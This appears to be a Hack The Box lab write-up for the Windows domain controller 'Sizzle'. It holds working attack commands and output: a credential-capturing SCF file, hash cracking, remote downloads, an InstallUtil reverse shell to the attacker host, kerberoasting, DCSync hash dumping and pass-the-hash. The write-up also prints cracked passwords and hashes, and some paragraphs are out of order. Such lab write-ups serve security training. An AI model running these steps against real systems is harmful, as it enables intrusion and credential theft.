HTB WriteUps
  • â„šī¸Main Page
  • 👨‍đŸ’ģwhoami
  • Linux Machines
    • Lame
    • Shocker
    • Beep
    • Jarvis
    • Europa
    • Knife
    • Irked
    • Postman
    • Mango
    • Cap
    • Writer
    • Bashed
    • Nibbles
    • Valentine
    • SwagShop
    • Tabby
    • SolidState
    • Doctor
    • OpenAdmin
    • Haircut
    • Blocky
    • Time
    • Passage
    • Mirai
    • Popcorn
    • Magic
    • Delivery
    • Blunder
    • BountyHounter
    • Cronos
    • TartarSauce
    • Ophiuchi
    • Seal
    • Ready
    • Admirer
    • Traverxec
    • Nineveh
    • FriendZone
    • Frolic
    • SneakyMailer
    • Brainfuck
    • Jewel
    • Node
    • Networked
    • Joker
    • RedCross
    • Static
    • Zetta
    • Kotarak
    • Falafel
    • DevOops
    • Hawk
    • Lightweight
    • LaCasaDePapel
    • Jail
    • Safe
    • Bitlab
    • October
    • Book
    • Quick
    • Sink
    • Pit
    • Monitors
    • Unobtainium
    • Inception
    • Compromised
    • CrimeStoppers
    • OneTwoSeven
    • Oz
    • Ellingson
    • Holiday
    • FluJab
    • Spider
    • CTF
  • Windows Machines
    • Jerry
    • Love
    • Arctic
    • Forest
    • Fuse
    • Bastard
    • Silo
    • Devel
    • Remote
    • ServMon
    • Blue
    • Grandpa
    • Legacy
    • SecNotes
    • Omni
    • Active
    • Granny
    • Optimum
    • Worker
    • Bastion
    • Bounty
    • Buff
    • Breadcrums
    • Reel
    • Reel2
    • Conceal
    • Bankrobber
    • Jeeves
    • Bart
    • Tally
    • Netmon
    • Sizzle
    • Sniper
    • Control
    • Nest
    • Sauna
    • Cascade
    • Querier
    • Blackfield
    • APT
    • Atom
  • OTHER OS MACHINES
    • Sense
    • Luanne
    • Poison
    • Schooled
Powered by GitBook
On this page
  • Enumeration
  • Exploitation
  • Privilege Escalation

Was this helpful?

  1. Windows Machines

Sizzle

Last updated 2 years ago

Was this helpful?

Enumeration

As usual, we start with an nmap scan, in order to find open ports in the target machine.

The following nmap command will scan the target machine looking for open ports quickly and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.103 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, it is the fastest mode of the nmap time template.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allports file.

# Nmap 7.93 scan initiated Tue Mar 21 11:06:25 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.103
Nmap scan report for 10.10.10.103
Host is up (0.047s latency).
Not shown: 65506 filtered tcp ports (no-response)
PORT      STATE SERVICE
21/tcp    open  ftp
53/tcp    open  domain
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
443/tcp   open  https
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
5986/tcp  open  wsmans
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49677/tcp open  unknown
49688/tcp open  unknown
49689/tcp open  unknown
49691/tcp open  unknown
49694/tcp open  unknown
49706/tcp open  unknown
49710/tcp open  unknown
49717/tcp open  unknown

# Nmap done at Tue Mar 21 11:07:04 2023 -- 1 IP address (1 host up) scanned in 39.67 seconds

As we see, there are quite a lot of ports open.

Let's try to obtain the services and versions of these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p21,53,80,135,139,389,443,445,464,593,636,3268,3269,5985,5986,9389,47001,49664,49665,49666,49667,49677,49688,49689,49691,49694,49706,49710,49717 10.10.10.103 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into file, in this case the targeted file.

 # Nmap 7.93 scan initiated Tue Mar 21 11:10:41 2023 as: nmap -sCV -p21,53,80,135,139,389,443,445,464,593,636,3268,3269,5985,5986,9389,47001,49664,49665,49666,49667,49677,49688,49689,49691,49694,49706,49710,49717 -Pn -oN targeted 10.10.10.103
Nmap scan report for 10.10.10.103
Host is up (0.040s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m34s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m35s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
| http-methods: 
|_  Potentially risky methods: TRACE
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m35s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m35s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m35s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2018-07-02T20:26:23
|_Not valid after:  2019-07-02T20:26:23
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|   h2
|_  http/1.1
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m35s from scanner time.
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49688/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49689/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
49706/tcp open  msrpc         Microsoft Windows RPC
49710/tcp open  msrpc         Microsoft Windows RPC
49717/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4m34s, deviation: 0s, median: 4m34s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-03-21T10:16:21
|_  start_date: 2023-03-21T10:02:36

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 21 11:12:26 2023 -- 1 IP address (1 host up) scanned in 104.84 seconds

As we can see, there are a lot of ports open. Let's start enumerating the SMB service. We can see the shares using a guest user.

smbmap -H 10.10.10.103 -u "guest"

[+] IP: 10.10.10.103:445        Name: htb.local                                         
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        CertEnroll                                              NO ACCESS       Active Directory Certificate Services share
        Department Shares                                       READ ONLY
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Operations                                              NO ACCESS
        SYSVOL                                                  NO ACCESS       Logon server share 

There is one share called Department Shares with READ ONLY permissions. This share contains a bunch of other subdirectories.

smbmap -H 10.10.10.103 -u "guest" -r "Department Shares"

[+] IP: 10.10.10.103:445        Name: htb.local
Disk                                                   Permissions     Comment
      ----                                                    -----------     -------
      Department Shares                                       READ ONLY
      .\Department Shares\*
      dr--r--r--                0 Tue Jul  3 17:22:32 2018    .
      dr--r--r--                0 Tue Jul  3 17:22:32 2018    ..
      dr--r--r--                0 Mon Jul  2 21:21:43 2018    Accounting
      dr--r--r--                0 Mon Jul  2 21:14:28 2018    Audit
      dr--r--r--                0 Tue Jul  3 17:22:39 2018    Banking
      dr--r--r--                0 Mon Jul  2 21:15:01 2018    CEO_protected
      dr--r--r--                0 Mon Jul  2 21:22:06 2018    Devops
      dr--r--r--                0 Mon Jul  2 21:11:57 2018    Finance
      dr--r--r--                0 Mon Jul  2 21:16:11 2018    HR
      dr--r--r--                0 Mon Jul  2 21:14:24 2018    Infosec
      dr--r--r--                0 Mon Jul  2 21:13:59 2018    Infrastructure
      dr--r--r--                0 Mon Jul  2 21:12:04 2018    IT
      dr--r--r--                0 Mon Jul  2 21:12:09 2018    Legal
      dr--r--r--                0 Mon Jul  2 21:15:25 2018    M&A
      dr--r--r--                0 Mon Jul  2 21:14:43 2018    Marketing
      dr--r--r--                0 Mon Jul  2 21:11:47 2018    R&D
      dr--r--r--                0 Mon Jul  2 21:14:37 2018    Sales
      dr--r--r--                0 Mon Jul  2 21:21:46 2018    Security
      dr--r--r--                0 Mon Jul  2 21:16:54 2018    Tax
      dr--r--r--                0 Tue Jul 10 23:39:32 2018    Users
      dr--r--r--                0 Mon Jul  2 21:32:58 2018    ZZ_ARCHIVE

Inside the Users directory, there are other subdirectories named as possible local system users.

smbmap -H 10.10.10.103 -u "guest" -r "Department Shares\Users"

[+] IP: 10.10.10.103:445        Name: htb.local                                         
      Disk                                                    Permissions     Comment
      ----                                                    -----------     -------
      Department Shares                                       READ ONLY
      .\Department SharesUsers\*
      dr--r--r--                0 Tue Jul 10 23:39:32 2018    .
      dr--r--r--                0 Tue Jul 10 23:39:32 2018    ..
      dr--r--r--                0 Mon Jul  2 21:18:43 2018    amanda
      dr--r--r--                0 Mon Jul  2 21:19:06 2018    amanda_adm
      dr--r--r--                0 Mon Jul  2 21:18:28 2018    bill
      dr--r--r--                0 Mon Jul  2 21:18:31 2018    bob
      dr--r--r--                0 Mon Jul  2 21:19:14 2018    chris
      dr--r--r--                0 Mon Jul  2 21:18:39 2018    henry
      dr--r--r--                0 Mon Jul  2 21:18:34 2018    joe
      dr--r--r--                0 Mon Jul  2 21:18:53 2018    jose
      dr--r--r--                0 Tue Jul 10 23:39:32 2018    lkys37en
      dr--r--r--                0 Mon Jul  2 21:18:48 2018    morgan
      dr--r--r--                0 Mon Jul  2 21:19:20 2018    mrb3n
      dr--r--r--                0 Wed Sep 26 07:45:32 2018    Public

Now we have a list of users that might be helpful in the future. We could check if we have write permissions on any of these directories. As seen, everyone has full permissions on the Public directory.

smbcacls "//10.10.10.103/Department Shares" Users/Public -N

REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

Exploitation

This means that we could upload files to that directory. We could try to create a SCF (Shell Command Files) file in the Public directory. When this file gets executed by any user, it will try to load an icon from our machine, authenticating in our local SMB server, and giving us their NTLMv2 hash.

nano pwn.scf

[Shell]
Command=2
IconFile=\\10.10.14.11\smbFolder\pwn.ico
[Taskbar]
Command=ToggleDesktop

Now upload it to the Public directory.

smbmap -H 10.10.10.103 -u "guest" --upload pwn.scf "Department Shares\Users\Public\pwn.scf"

Then, set the SMB server. If any user opens the file, it will try to load the icon from our SMB server, giving us their NTLMv2 hash.

impacket-smbserver smbFolder $(pwd) -smb2support

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.103,49303)
[*] AUTHENTICATE_MESSAGE (HTB\amanda,SIZZLE)
[*] User SIZZLE\amanda authenticated successfully
[*] amanda::HTB:aaaaaaaaaaaaaaaa:49dd44091b94b3f557a53d7cb7aa9a92:0101000000000000002e31e9255cd9010a5238f40c86656d000000000100100061007900550058006f00480065004d000300100061007900550058006f00480065004d000200100077005100460048005600510074004500040010007700510046004800560051007400450007000800002e31e9255cd90106000400020000000800300030000000000000000100000000200000bd5e1a6a5f1cc249073ee270b329409cdf07c12fc5a21f4f21f047786e2945680a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003100000000000000000000000000
[*] Connecting Share(1:IPC$)
[-] SMB2_TREE_CONNECT not found share
[-] SMB2_TREE_CONNECT not found share

Copy the hash, paste it into a file, and try to break it with john.

john -w=/usr/share/wordlists/rockyou.txt hash

Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ashare1972       (amanda)     
1g 0:00:00:04 DONE (2023-03-21 19:53) 0.2475g/s 2826Kp/s 2826Kc/s 2826KC/s Ashiah08..Ariel!
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

Let's keep enumerating the machine. As we saw in the nmap scan, port 5986 is open, and it hosts a WinRM server, but uses SSL certificates. We might need to create our own certificate to be able to log into the machine. Nmap also reported that port 80 is open. Let's take a look at it.

As we can see, the web server is a Microsoft IIS 10. Let's try to enumerate website subdirectories using a custom IIS wordlist.

gobuster dir -u http://10.10.10.103/ -w /opt/SecLists/Discovery/Web-Content/IIS.fuzz.txt -t 200 --no-error

===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.103/
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/IIS.fuzz.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/03/21 19:58:28 Starting gobuster in directory enumeration mode
===============================================================
//images/             (Status: 403) [Size: 1233]
//<script>alert('XSS')</script>.aspx (Status: 400) [Size: 3420]
//~/<script>alert('XSS')</script>.aspx (Status: 400) [Size: 3420]
//certenroll/         (Status: 403) [Size: 1233]
//certsrv/            (Status: 401) [Size: 1293]
//aspnet_client/      (Status: 403) [Size: 1233]
//certsrv/mscep_admin (Status: 401) [Size: 1293]
//certsrv/mscep/mscep.dll (Status: 401) [Size: 1293]

===============================================================
2023/03/21 19:58:29 Finished
===============================================================

The certsrv directory shows a 401 status code. If we take a look at it, it will ask for credentials. Let's use the ones we have.

We log into Active Directory Certificate Services.

This utility will allow us to create our certificate, and log in with the WinRM service using SSL certificates. First, create a private key and a certificate signing request.

openssl req -newkey rsa:2048 -nodes -keyout amanda.key -out amanda.csr

.+...+.......+.....+.+..+...+......+...+............+++++++++++++++++++++++++++++++++...+..+.............+...........+...+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

Now, on the website, go to Request a certificate.

Then go to advanced certificate request, copy and paste the amanda.csr certificate signing request into the Saved Request filed, and press Submit.

Download the certificate by clicking on Download certificate.

Finally, we can log into the machine using the WinRM service and the SSL certificates.

evil-winrm -i 10.10.10.103 -u 'MRLKY' -p 'Football#7' -S -c certnew.cer -k amanda.key

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\amanda\Documents> whoami
htb\amanda

Privilege Escalation

The shell that we have is quite limited. It is in constrained language mode.

$executioncontext.sessionstate.languagemode

ConstrainedLanguage

python -m http.server 80

Now, create the privEsc folder inside \Windows\Temp, and download the PsBypassCLM.exe binary from our HTTP server there.

mkdir \windows\temp\privEsc; cd \windows\temp\privEsc

iwr http://10.10.14.11/PsBypassCLM.exe -outfile PsBypassCLM.exe

Now, set a netcat listener on port 4444.

rlwrap nc -lvnp 4444

Finally, run the following command, and catch the reverse shell, but this time with full language mode.

C:\windows\temp\privesc> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.14.11 /rport=4444 /U c:\windows\temp\privEsc\PsBypassCLM.exe

Listening on 0.0.0.0 4444
Connection received on 10.10.10.103 59777
whoami
htb\amanda
PS C:\windows\temp\privesc> $executioncontext.sessionstate.languagemode
FullLanguage

As we have credentials, we could run BloodHound remotely with the bloodhound-python tool. Make sure to the add htb.local entry to the /etc/hosts file.

bloodhound-python -c All -u 'amanda' -p 'Ashare1972' -ns 10.10.10.103 -d htb.local

INFO: Found AD domain: htb.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (htb.local:88)] [Errno 110] Connection timed out
INFO: Connecting to LDAP server: sizzle.HTB.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: sizzle.HTB.LOCAL
INFO: Found 8 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: sizzle.HTB.LOCAL
INFO: Done in 00M 08S

Now, we have to start BloodHound. First, we have to start neo4j.

neo4j console

Then we will search for the localhost on port 4747 and log in with the username neo4j and password neo4j. You’ll have to change the password.

On a new console, run BloodHound.

bloodhound -nosandbox

Then log in with the credentials you set earlier.

Then, click on the Upload Data button on the right section and select all the .json files.

Once all the .json files are uploaded go to the Analysis section. There we'll see that the user MRLKY user a kerberoasteable account.

We can't exploit this vulnerability yet, because port 88 (Kerberos) is not exposed externally. We can also see that this user has DCSync rights, which we could exploit to gain domain admin privileges.

A user with the DCSync permission impersonates a Domain Controller and requests account password data from the targeted Domain Controller.

Let's start with the kerberoasting attack. As we can see Kerberos is only accessible internally.

netstat -nat

Active Connections

  Proto  Local Address          Foreign Address        State           Offload State

...
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       InHost
...

To exploit this vulnerability, we'll have to use Rubeus. Set a simple HTTP server where the Rubeus.exe binary is located.

python -m http.server 80

Download the file from the victim machine.

iwr http://10.10.14.11/Rubeus.exe -outfile Rubeus.exe

Finally, exploit the kerberoasting vulnerability using the credentials of the amanda user. We should get the hash of the MRLKY user.

.\Rubeus.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972

   ______        _                                                                                                     
  (_____ \      | |                                                                                                    
   _____) )_   _| |__  _____ _   _  ___                                                                                
  |  __  /| | | |  _ \| ___ | | | |/___)                                                                               
  | |  \ \| |_| | |_) ) ____| |_| |___ |                                                                               
  |_|   |_|____/|____/|_____)____/(___/                                                                                
                                                                                                                       
  v2.0.2                                                                                                               
                                                                                                                       
                                                                                                                       
[*] Action: Kerberoasting                                                                                              

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : HTB.LOCAL
[*] Searching path 'LDAP://sizzle.HTB.LOCAL/DC=HTB,DC=LOCAL' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1


[*] SamAccountName         : mrlky
[*] DistinguishedName      : CN=mrlky,CN=Users,DC=HTB,DC=LOCAL
[*] ServicePrincipalName   : http/sizzle
[*] PwdLastSet             : 7/10/2018 2:08:09 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*mrlky$HTB.LOCAL$http/sizzle@HTB.LOCAL*$1195793B964FAC38DC1FBB2DD6B5
ED45$B5E46E7FC7822CFDC0DFA72D985BC6723E78FFE6FCFAC18A5231DD1492A17DCAA82D6A8EA6C
0069947AB0A5163D65A2BB03C84789875441463E2C92C45F4F37A701D6879A9B6C2CB16D0D8F1F70
3D9B237EE2040AB5C55062944739CB898B610E08F7080B600BD95771942CE48C715579520B58B668
9775A335BAA43CB8A0EBB0291B91820B211ED530FFF4731694C001C1CC1EF92FCC1A05ECA4E66E29
86F7E58A327EC1D74B191CA0356C052DACD344E43A7A3CAA16122EB2D3574B2D78AB0C726BA6E0A4
35FA203E8796BCB8EB1D2642726C8774E749E0B602B8AC3A14F90D47ECFB0DE29FF10A436FA16313
6EACC64D4B906D636D54AE62427D5295EAE0E6BF991BE2CFCAC28F5700DC2EBB6E2490C782637295
7C16D1B1D23243B6A5ED2CDC6698B1B81B58EB95D6BE0DFC62C3DD1F2B97E40DD2DC58C33A65CD1A
E32C2D560AC77599017183DF7394C3B06DCA25A9F35C5664026AEE07641035BE35D807B22A40FD9F
14C12E0FE77237F6DD7859D19320596B6559D92BA1BFE2B0756F5FD50B670D69E0C32420686294AC
C78F00825E4647084E143BFA84E2B45487D175F3455E55A43FD85F70E32DB4A18CFD73E7C00A833A
EC3ED5AC9D2B3D725CB3DADEEFF7C1BB18E41FCABF57B3FE2FB3481B2830D7FC85833E288408A6F2
A084446749CF53F7B83A619FD90AADB6782D76FFC6733B3B9422C1F4AA133CD7DE7400739FCC7584
6D51CF130CD78C6332ACE0A8A68DDBA75F3F75F2E956AE23A60FC8286A6BFE683B347B4E11414410
04538C1924E334C3AEE6C17A6D94C13CBF29AD92B707A096CDC9DDF2D24BD1A0D261CA26907A9522
988D90D85D5972D92477405F26DA8DA9FFCD174EF5504265DA3F43149030B50FF8D9405C0BDAF49B
57C452555D8BE3159E44F4F8479B52DC10DB69CB670B5A129698135847D036519E4F7CB493D05BD2
5FE1F57400F26100455D4F98A8FE6ADD740E2B28F88A1ADA8BDB021BA94DAB863360AEBA2CE52BCC
4B0DAF40BF4BA5CBB6FDAF1495BFF49AFB461CD7C6872EAFFFC8057A57FABCC987E261330165E862
8827EAACE6FF7FD1729073F9A2E5498C8558B3277ED0FCD22C60E6E47AC32459AC963562EA17672C
DBE16DE589055E657DFAB15392D89696017F1BC64D78CAB7F90E0730DE7039E3E8511059CE85861A
F7082CEFF64F34F232CB4D8A6069471E7C52FA03041CDE1836C11D812FDE2C5213C6CA6F447B2C68
F11F3503F036678E8457B5C406C2BBFF8E0D62C67353E22AB5DA9D0A6E947F3D47113B2280AE6647
6AE2E2BB751ED3915C5FC260D9CF85B46226F6772F7323C42E35BE318F1ABDA0CE53E46B6CE062E4
74A4BFFA7E796138A

Copy the hash, and break it with john.

john -w=/usr/share/wordlists/rockyou.txt kerb_hash

Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Football#7       (?)     
1g 0:00:00:04 DONE (2023-03-21 21:08) 0.2247g/s 2509Kp/s 2509Kc/s 2509KC/s Forever3!..Flubb3r
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Now that we have credentials for MRLKY, and as it has DCSync rights, we can dump hashes of every local user remotely with secrets-dump.

impacket-secretsdump htb.local/mrlky:'Football#7'@10.10.10.103

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
sizzler:1604:aad3b435b51404eeaad3b435b51404ee:d79f820afad0cbc828d79e16a6f890de:::
SIZZLE$:1001:aad3b435b51404eeaad3b435b51404ee:1797d4bb27f59619665045685d5bb21a:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:e562d64208c7df80b496af280603773ea7d7eeb93ef715392a8258214933275d
Administrator:aes128-cts-hmac-sha1-96:45b1a7ed336bafe1f1e0c1ab666336b3
Administrator:des-cbc-md5:ad7afb706715e964
krbtgt:aes256-cts-hmac-sha1-96:0fcb9a54f68453be5dd01fe555cace13e99def7699b85deda866a71a74e9391e
krbtgt:aes128-cts-hmac-sha1-96:668b69e6bb7f76fa1bcd3a638e93e699
krbtgt:des-cbc-md5:866db35eb9ec5173
amanda:aes256-cts-hmac-sha1-96:60ef71f6446370bab3a52634c3708ed8a0af424fdcb045f3f5fbde5ff05221eb
amanda:aes128-cts-hmac-sha1-96:48d91184cecdc906ca7a07ccbe42e061
amanda:des-cbc-md5:70ba677a4c1a2adf
mrlky:aes256-cts-hmac-sha1-96:b42493c2e8ef350d257e68cc93a155643330c6b5e46a931315c2e23984b11155
mrlky:aes128-cts-hmac-sha1-96:3daab3d6ea94d236b44083309f4f3db0
mrlky:des-cbc-md5:02f1a4da0432f7f7
sizzler:aes256-cts-hmac-sha1-96:85b437e31c055786104b514f98fdf2a520569174cbfc7ba2c895b0f05a7ec81d
sizzler:aes128-cts-hmac-sha1-96:e31015d07e48c21bbd72955641423955
sizzler:des-cbc-md5:5d51d30e68d092d9
SIZZLE$:aes256-cts-hmac-sha1-96:e985e3242ddab2d401376c3527d531494d3144eeb54af63c0ec63cfeeda820ac
SIZZLE$:aes128-cts-hmac-sha1-96:122ee362400920a3a62f093461beb364
SIZZLE$:des-cbc-md5:405de57037dc32ea
[*] Cleaning up...

As we have to NTLM hash of the administrator user, we could do pass the hash and get a shell as nt authority\system. Then all we have to do is reap the harvest and take both the user and root flags.

impacket-psexec htb.local/administrator@10.10.10.103 -hashes aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 10.10.10.103.....
[*] Found writable share ADMIN$
[*] Uploading file ftRDykyJ.exe
[*] Opening SVCManager on 10.10.10.103.....
[*] Creating service zRZi on 10.10.10.103.....
[*] Starting service zRZi.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type \users\mrlky\desktop\user.txt
168224d790f5c7ef7113300aeceb7e9d

C:\Windows\system32> type \users\administrator\desktop\root.txt
83db2d37e4884fb0beadde14a9d025b7

We need to bypass this limited shell. We can do it with the tool. Clone the repository, then go to PSBypassCLM/PSBypassCLM/bin/x64/Debug, and set a simple HTTP server.

PSByPassCLM